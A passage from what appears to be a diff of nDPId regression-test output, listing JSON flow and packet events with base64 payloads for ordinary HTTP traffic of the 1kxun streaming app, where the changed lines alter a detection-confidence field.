CJhSDSSgKQg6YgUUSLFyHKkAqlCapFdSCPyLXIUOY1cQPqQ28ggMor8irxHMZSBslED1AJ1QLmoHxqKxqBz0XQ0D12AlqJr0Rq0Hj2AtqKn0UvodXQAfYqOY4DRMQ5mjNlhXIyHRWCJWBomxxZj5Vg1Vo81Yx1YN3YVG8CeYe8IJAKLgBPsCF6EEMJsgpCQR1hMWEOoJewjtBK6CFcJg4Qxwicik6hPtCV6EvnEeGI6sZBYRqwm7iEeIZ4lXicOE1+TSCQOyZLkTgohJZAySQtJa0jbSC2kU6Q+0hBpnEwm65Btyd7kCLKArCCXkbeQD5BPkvvJw+S3FDrFiOJMCaIkUqSUEko1ZT\/lBKWfMkKZoKpRzame1AiqiDqfWkltoHZQL1OHqRM0dZolzZsWQ8ukLaPV0JppZ2n3aC\/pdLoJ3YMeRZfQl9Jr6Afp5+mD9HcMDYYNg8dIYigZaxl7GacYtxkvmUymBdOXmchUMNcyG5lnmA+Yb1VYKvYqfBWRyhKVOpVWlX6V56pUVXNVP9V5qgtUq1UPq15WfaZGVbNQ46kJ1Bar1akdVbupNq7OUndSj1DPUV+jvl\/9gvpjDbKGhUaghkijVGO3xhmNIRbGMmXxWELWclYD6yxrmE1iW7L57Ex2Bfsbdi97TFNDc6pmrGaRZp3mcc0BDsax4PA52ZxKziHODc57LQMtPy2x1mqtZq1+rTfaetq+2mLtcu0W7eva73VwnUCdLJ31Om0693UJuja6UbqFutt1z+o+02PreekJ9cr1Dund0Uf1bfSj9Rfq79bv0R83MDQINpAZbDE4Y\/DMkGPoa5hpuNHwhOGoEctoupHEaKPRSaMnuCbuh2fjNXgXPmasbxxirDTeZdxrPGFiaTLbpMSkxeS+Kc2Ua5pmutG003TMzMgs3KzYrMnsjjnVnGueYb7ZvNv8jYWlRZzFSos2i8eW2pZ8ywWWTZb3rJhWPlZ5VvVW16xJ1lzrLOtt1ldsUBtXmwybOpvLtqitm63Edptt3xTiFI8p0in1U27aMez87ArsmuwG7Tn2YfYl9m32zx3MHBId1jt0O3xydHXMdmxwvOuk4TTDqcSpw+lXZxtnoXOd8zUXpkuQyxKXdpcXU22niqdun3rLleUa7rrStdP1o5u7m9yt2W3U3cw9xX2r+00umxvJXcM970H08PdY4nHM452nm6fC85DnL152Xlle+70eT7OcJp7WMG3I28Rb4L3Le2A6Pj1l+s7pAz7GPgKfep+Hvqa+It89viN+1n6Zfgf8nvs7+sv9j\/i\/4XnyFvFOBWABwQHlAb2BGoGzA2sDHwSZBKUHNQWNBbsGLww+FUIMCQ1ZH3KTb8AX8hv5YzPcZyya0RXKCJ0VWhv6MMwmTB7WEY6GzwjfEH5vpvlM6cy2CIjgR2yIuB9pGZkX+X0UKSoyqi7qUbRTdHF09yzWrORZ+2e9jvGPqYy5O9tqtnJ2Z6xqbFJsY+ybuIC4qriBeIf4RfGXEnQTJAntieTE2MQ9ieNzAudsmjOc5JpUlnRjruXcorkX5unOy553PFk1WZB8OIWYEpeyP+WDIEJQLxhP5aduTR0T8oSbhU9FvqKNolGxt7hKPJLmnVaV9jjdO31D+miGT0Z1xjMJT1IreZEZkrkj801WRNberM\/ZcdktOZSclJyjUg1plrQr1zC3KLdPZisrkw3keeZtyhuTh8r35CP5c\/PbFWyFTNGjtFKuUA4WTC+oK3hbGFt4uEi9SFrUM99m\/ur5IwuCFny9kLBQuLCz2Lh4WfHgIr9FuxYji1MXdy4xXVK6ZHhp8NJ9y2jLspb9UOJYUlXyannc8o5Sg9KlpUMrglc0lamUycturvRauWMVYZVkVe9ql9VbVn8qF5VfrHCsqK74sEa45uJXTl\/VfPV5bdra3kq3yu3rSOuk626s91m\/r0q9akHV0IbwDa0b8Y3lG19tSt50oXpq9Y7NtM3KzQM1YTXtW8y2rNvyoTaj9nqdf13LVv2tq7e+2Sba1r\/dd3vzDoMdFTve75TsvLUreFdrvUV99W7S7oLdjxpiG7q\/5n7duEd3T8Wej3ulewf2Re\/ranRvbNyvv7+yCW1SNo0eSDpw5ZuAb9qb7Zp3tXBaKg7CQeXBJ9+mfHvjUOihzsPcw83fmX+39QjrSHkr0jq\/dawto22gPaG97+iMo50dXh1Hvrf\/fu8x42N1xzWPV56gnSg98fnkgpPjp2Snnp1OPz3Umdx590z8mWtdUV29Z0PPnj8XdO5Mt1\/3yfPe549d8Lxw9CL3Ytslt0utPa49R35w\/eFIr1tv62X3y+1XPK509E3rO9Hv03\/6asDVc9f41y5dn3m978bsG7duJt0cuCW69fh29u0XdwruTNxdeo94r\/y+2v3qB\/oP6n+0\/rFlwG3g+GDAYM\/DWQ\/vDgmHnv6U\/9OH4dJHzEfVI0YjjY+dHx8bDRq98mTOk+GnsqcTz8p+Vv9563Or59\/94vtLz1j82PAL+YvPv655qfNy76uprzrHI8cfvM55PfGm\/K3O233vuO+638e9H5ko\/ED+UPPR+mPHp9BP9z7nfP78L\/eE8\/sl0p8zAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAA2FSURBVHja7FprzGXlVX7Wet99O7fvfps7M8wwlwBTBpRSW6AFLGJqULS1P7SNaPnR2B81aVAiNTZKlEZJq1RiUjWVtKAI0Yy2dUBKKQMMQxkGyqXDzMcw3\/1+Lvvsvd93LX+c7\/vmwoCgaEPkTc7Jzs7Ze6\/nXWs961lrH1JVvJsX412+3vUAbOuxzwEACIK0qKBZdIHUG2ZHxCyptKWY\/ic0sQaZ6UZZxxFRHWlpI8arH8OWcg6a\/jGKNqG31oNRHkRN59GQABvcLMQthyh1vomgPkyAQJEHMUZpHWL3LPpP3AcjGZo8iAIVRFhCLb4UQVhBV7UgBXYCGAXQONMDZvkDVVp+GFkVFjUq81EXZOX821zKDCYCswIgEJRV3k54CKBC4hVQKAA9WwjFAGJVQmRTGPJQNZlqKsopWlyDwERCgfUIWchaJRMIBabhLdSWAI5ApCAwoAQoQKpYSroxlU9gznZBySGF8fMeIBgoJ1BO0JIQjmJSNpESxwIbCKwVcDBVG+FWMKwLWZcCeN6wNA08Tv1YgjYBgBjwzgNoQ9UB1IZL3XBfe++tFZncWfJL3nPsQtQjqHeJ1qVqilZlws+m9faBuvnAw62iecTHfW0SAhGQw6LhmkgYaNafwtzADQiaU9Bs6uogfe4KA+46L6gOUzZWLuev9bI6G6HezqnSJOScNb632KT3\/x2S2gNNcVAFmq4EMuZkDuQSgqDIKcZS2yKOFQttYH5iDlUa\/9Rm+u5NCmCuqM4x2SJX4Z5gcWCukS9h8eFWk\/KgO8w+XZEDraxZ\/qHt+dW782TTX4MkIyiYGASCIIRtjV\/Z1fznm5P24avC2NFiCxAXT2amxy3xsFchJaMyIMfPqcYZpDGOpvvRRa3q578\/i+FZuBwzWRcoSlajyTZ8FaSKOveAtA7RAn2D3egOl2COPf0zBRGy+NKvz\/RecuuxsR\/na6tDQVfcvuiR+YHD7EfrXWGpx9vej27XB39tAMcu2TzzZ5cthruvr\/de98caDe1TslCVrWX\/0hd6pvfdUCoVXUex6Znniqvv7qmELy7MH3nskcnN3oXrBWEMT+xvKt+xo6lDu8vuhTsMWoPTsran2nhktmwBYy4GkQeW65clqCVSYYiAGaKWLWk\/9W6rhseLixaapdaJ5Prb1pVnjx+nDBWjoGTHa8HSPLhIwdQ1vcDbXjo2vPvug9Nj5+1auvf3t4Q\/vKY2+dzu6fwXv2yInhycuesvExnd2kYsx3HVV5vrdnzl+Rf6X7pobYiQXkRPaDHfXgB8BM3qmOq79vHJ+LITFy7+9u3eeEr8aPeaxbuw0Ptpqxw50uJkCJHAkwcQWECaW9qTj9\/cf2L\/DaJkWVtlUGnBD3+QK1vOx87BCWD0b6HSXHYhAVAkNoPlYKYWxzOLa2\/6rSfr37vxp4N7bhmY\/dYf9VFUhDYLnI\/T0ZHP\/2Yt6P17YBJJWIAV8KcwSi4e29cMwXZvAaEoUdMUkc51r5n40r0qbqJYOHQ46N3+jSJa8zCkA8LCacCGJXXkbP3ZW0bcvk810sq8M0m7xzbKZBhNAjWcB8dDKA9cDEw8uErsp67CC0bi+qjv3vPlp9td6XnZ178YmSyYtud\/hweuvW3I9jwkurjMiGdcK4Jzhsu4dOsIhFKoqmIWQlAKqb5JGZtGaP+lczOzW2TTb1xjiBxIYYmC3EuKMH2ASu75tWmb60+4T1zLA+8b24J77uxfOHDV0aMP6rGj+1CIx7a+AJfYBJZTnE7phEJCxMiRxLLgei\/504X80Suq6ZErlzbe8Ht96DrQ1Z7GkjWgM\/RXVhTYvHYQl+9aAyeyWneYnc3yUjYfXHt7QlMSp098roaXr8h1ao1y9VVAYEU9Gtk85lolDXwlK6hWzAfB0WqRTZ2g8x7r1yc\/2k4ZIAXD4OlRgR\/sQ+FnECwHgKiBZaCbjqLRylEEAiuvFm3HL9RM8uHR6f7GoskwEpXQ8gRnZJVFXJFj+4Yh7Dx3I0Rcx\/CO\/QqFNYampXbBLceDAV47NfaJyB2pKRmn1FFBdmLpeRQ+AyiEgkBEWiibg1OMS2suJKwkPEEARJbx3HQB5h6sj9dBoYhNiu75x9Ga+xHmiAAmiDB6uRESAYa8WXAWs3kVACEJy1hXVTDq6B3ZgfVrz4GqXzX+VP+QKozOYqYYqq5jsxK3SrRSB1wKIgbRqcEAGPWnnTtNQBmCKjCZb8NQ8CiS5otIXQqy0cnMsKZTlZeXYcBQRw04B1QDAnEVyfBlEDmrSjgtPC2d\/TeW6L8rSBWGCJGfBuAADt7ylSsbU3iGigcR\/eTktMKclZHeDpD3Gpr3ALwH4P8BgDfqCt8igJXSiFP6OlqWc\/K\/bz0RZNnUM1n\/f+QBp4BHCDpNU76NXYWB1\/AnE0IERssBz9C18FTGirx968YzQj+BcvsQMkn+bwGQhqiFLXheQBquBQZ+HsbEnV76LcWzwpgSLGXoG\/0ahtKHkPrqOwtATQhRBkQRGaLYMBLDIDDWV8YxHDwLUUDyFDYaQH\/f5bBUAv6LnBAAPVbRE0bwCEBMGBm\/C8PpPqS+8oY5wNTJvDPHMm8IgH3emcswgUGwIGSecW5pFEP5o1CiVWklvkAc9qO7a+eqJD7rphAQkGJNsNzTEqBkoaIYPnFnB4SUV6iCTrKHwvLKwOYtAFBVFAooOpfkzms9t9iSHMHG7NsAEfSMS71kqESbEJjaG4ZS5gj97GFVTxWqq7s6fOJrGG49hNTXAHTkp2rnwOvZrWWoLgv+k+CsNah296EzEANqScnvqr6I89wDADNUz+44NgFqg3ugeQGXLpzmbxVFOSJYG6xOFE7ftGUQ43+F4XQfGq4snfakg9ULkQpeJ56tkl3meAuA4b1H\/+AQNm64AAsHvwMnim2Di9XhpUeQqyFPgXqycAiRFxGici88p1CNAclRTobR85HfRcoxsie+BG3NdUaWBKyrFJAiAXkHT2U4xFCQBVBaAUEiGBm7E26Eu4VCMpSB2cIub8aZOWCXogs6IWAS1HS6TcUr2LTzeoRFG1wsNroqqdk6d9s9mQ9ejuHCEppFovV2t5\/LegYaTcZrWV8jq0faHptJPnRXoGlroLoW3L8H7tBXVJcyDhqv2lpkUInWYL4xgXbW\/NiAPXxlNZ+ohEi3A7iQGeHK7hIUGye\/yuIRkDEmT2eQZlvY556Jl4sZd4LGVmh0mR0iRLQQeAa5dJLft+tDqB\/78L3j8xNXd5dntpPoT4mwBCSUiJLRcUrcoR5mgFznfqOF31Dp2fWvY4f3f7c6+DKQzjnYWIrahqLWXaDddsNd7b1\/2NV89pNJ0i4RAE+ANxYNHhlTDqBgXekVotjX8+49ty\/yuZiZdWwiQygA2CBEGAHiYUPML3NzACNN47jq9h\/4QbHgS0i0ODbd9Ss\/9wSVq2mWJ5kjjRjIC0Ev1+n99M11g13nrnulXd15aA7BMA5ft37p33\/9B\/1\/8MnL0r2H+9xLH2hzJV+U3kUrh6+onvjGHVbGL4hCWWhj6OFm7cr748n7W3UamH6m8plDM1kZuUQKJbBh7BqUelhMN4\/NAWyTtndWAEAz7yAOUA+bobsDgCIoR9KiWuvhxeHpvf9wD0gCJBq4VrIwH7hwnqgznVAhSJrjWP8vjG1zpSfGfN99B\/MevLb0kW\/9ef+t+66pf2GvL1zBjMgKNS+k+75YOfH9PUPJ5AX3N3\/5trG5nps34Cjm6zvw6qhBphZT7gXkMFAmECtKRnHgGY9mJrh452aze1P7g6V0tluVPRyRCgHEsCezWqHEEnBe6lt45LN7+nKTtUGBiORRwCb3AjBAgAgQRA4uzfngi1AbWtlgDNks5GggC8g7BhCJACGl5XOa\/3ijKFBkQJcf33JkyX581McBFQ+ZkZC9jazbHNkQQcBkCEwAu0IKr9RGnO2mvdedP33kl8gtJaI2F2ECM9h70GPfvrGTxBShr\/nUN0ea+z9uaJkR+CRPv1nvr3Kyv82KN58vWAMYOp3TV1lVzxDAnVoHr4CXZZuIWtnm39kGxCeivA7bql4OAGj5EL1YaGlrP3J\/St3H649PBfa6qm8A9W8sypUAh7Mrjjd7e0MEGAvM6jmPzjfDqbXcgmGF7S11ntZLOZZwyZ\/E8cvrWRY3wLVJwapklKVtiAkKo6KsqqxEQoAn1oKhCiIhhfVGWtWE5ofPrFVEQG4qM6lZM0Va2NNGErK8\/Sy0gpSYlSDEyBkmUKexJxN7Ku\/5i8EIRegKFiFDTz39N6tv31r1Fsqx5clGqzsujrNSqBkqWnGjhoxBQWUppAyvgZIviPMGYj9tAAX7NnlEPq5Uq5uyf7vPpq\/sXlHYNgSW\/MjEVM\/PXj1pdxwP\/KIFc8dTq12SwiAjUEdFUBhqYAqExZRBqVtn8vXe03q\/pzraHMRr0s6NuKxTfk9xsYB8KrFJ50yRQaEIyYI1B6mBgYVoJ0ZIC7BmYMkBKFiLjnAx\/TNZaetn5tzwZ+Pi+U1GM9O0u8ZLA7v+JSlffDhYmoVBBiifVDC6PGHSbDUZSBUsRef+kiEybQhlYMkg1PEoMU4H8I50fxCAzNFWsPE\/GEe3BhDb5LXHk3j44Iokfkef927\/q8F\/DgCIXuq2\/murMQAAAABJRU5ErkJggg=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":565,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":565,"pkt_l4_len":531,"thread_ts_msec":1654385134408,"pkt":"tKXvZygQnLbQ0+MzCABFAAInA91AAEAGThXAqAJ+rGh3UMBaAFDHE+5UhHHU2IAYAfbo+AAAAQEICpOtHJliB5VhUE9TVCAvYXBpL3VwbG9hZC5waHAgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1MZW5ndGg6IDI2NQ0KSG9zdDogYW5kcm9pZC55aW5nc2hpLnRjY2xpY2suMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0KeJxNkN1uhCAQhV+lmWtjBPxB7rav0PSqaQzC7C5RwSC6JhvfveC2SRMumO8wZw7zhGAmXIKcZhCkrkrGK8JI9gYaN6MQxBNWbTQI0JRhRZG3Ta\/LK+Ot1oVqSkYVr0nsggzUXVqLY3xMhn21kUxOn\/Wih+42353Fbud1FHovbXK9OXcbMQK3dBv6xTib2pObnOd\/iOY8p\/k5RXpv0Ed2sdq7GC4Dj4sb1\/DbXfBiJ01bRmF0SkZ\/AWi7z48ILIaH80MkD3M1aczLpDs\/2bdIedPUrCo1rdoUbJIqCgUVpBLvVBTF68CRliSDTCuSKpjNBIMLiK\/vDHBXOKc0f\/WGNpz34\/gBCIhwTg=="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"android.yingshi.tcclick.1kxun.com","url":"android.yingshi.tcclick.1kxun.com\/api\/upload.php","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"android.yingshi.tcclick.1kxun.com","url":"android.yingshi.tcclick.1kxun.com\/api\/upload.php","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1654385135021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1654385135021,"pkt":"nLbQ0+MztKXvZygQCABFAAEVhPRAADUG2Q+saHdQwKgCfgBQwFqEcdTYxxPwR4AYAfrU9wAAAQEICmIHlwGTrRyZSFRUUC8xLjEgNTAwIEludGVybmFsIFNlcnZlciBFcnJvcg0KU2VydmVyOiBvcGVucmVzdHkvMS4xMS4yLjUNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjU6MzQgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClgtUG93ZXJlZC1CeTogUEhQLzcuMS45DQoNCjANCg0K"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136206,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIhQ1AAEAGzADAqAJ+rGl5UrRoAFD5HfAjxRS50IAYAfbp3AAAAQEICvK1GtLJoc6VR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzI5OS80NzA0LTUwMTdiY2RjYWNjMDJjYzNhZjQ4MzNjZDFlZDcyYThmLmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/299\/4704-5017bcdcacc02cc3af4833cd1ed72a8f.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/299\/4704-5017bcdcacc02cc3af4833cd1ed72a8f.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136207,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIuBVAAEAGmPjAqAJ+rGl5UrRaAFA4F3kV79XZwoAYAfbp3AAAAQEICvK1GtPJoc6VR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzI5Ni80NzAxLWUxNGQwNDgxYzhmYmU4YTQyNzk1YWJiODc5Y2RhMmQyLmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/296\/4701-e14d0481c8fbe8a42795abb879cda2d2.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/296\/4701-e14d0481c8fbe8a42795abb879cda2d2.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136215,"pkt":"tKXvZygQnLbQ0+MzCABFAAEI535AAEAGaY\/AqAJ+rGl5UrR4AFBRsl56JroizIAYAfbp3AAAAQEICvK1GtvJoc6eR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzMwMS81MDI3LWQ3MDcxOTJiZmEyZGFiZjIyNzcxYTRkNTY0NTRhYjg4LmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/301\/5027-d707192bfa2dabf22771a4d56454ab88.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 